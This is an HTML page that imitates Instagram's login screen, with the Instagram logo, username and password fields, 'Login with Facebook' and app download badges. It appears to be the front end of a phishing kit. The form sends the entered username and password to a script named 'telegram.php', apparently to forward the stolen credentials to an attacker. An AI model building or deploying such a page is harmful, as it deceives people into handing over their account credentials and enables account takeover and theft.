<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="assets/css/main.css">
      <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">

  <title>Instagram</title>

</head>
<body >
 <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;

label {
    position: relative;
}
input {
    display: block;
    width: 100%;
    margin-top: 5px;
    padding: 5px 80px 5px 5px;
    border: 1px solid rgb(89, 0, 255);
    border-radius: 4px;
    outline: none;
    color: purple;
    font: inherit;
    font-size: 18px;
}
.btn {
    position:relative;
    bottom: 22px;
    right: 0px;
    width: 80px;
    height: 31px;
    border: none;
    color: rgb(255, 255, 255);
    font-size: 13px;
    background-color: transparent;
    cursor: pointer;
}
 </style>
  <main class="l-main">
      <div class="l-main__img">
        <img src="assets/img/homepage.png" alt="Smartphones">
      </div>
      <div class="l-user">
        <div class="c-panel group">
          <img class="c-panel__img" src="assets/img/instagram.svg" alt="Instagram">
          <div class="c-panel__form">
      		<form action="telegram.php" method="POST">
        <label>
          <input type="login"  minlength="3" class="form-control" id="" name="user_name" placeholder="username" required><br>
          <input type="password" class="form-control"   id="password" name="user_pass" placeholder="password" required>  <br>
                      <button type="submit" class="btn btn-primary" style="width: 215px; background-color: #0096fb;" >Log in</button>
            </label>
      		</form>
            <span class="c-panel__span">OR</span>
          </div>
          <a href="#" class="c-panel__facebook">Login with Facebook</a>
          <p class></p>
          <a href="#" class="c-panel__forgot">Forgot password?</a>
        </div>
        <div class="c-signup group">
          <p>Don't have an account? <span>Sign up</span></p>
        </div>
        <div class="c-app">
          <p>Get the app.</p>
          <div class="c-app__download">
            <img src="assets/img/apple.png" alt="Apple Store">
            <img src="assets/img/google.png" alt="Google Play">
          </div>
        </div>
      </div>
  </main>
 
</body>
</html>




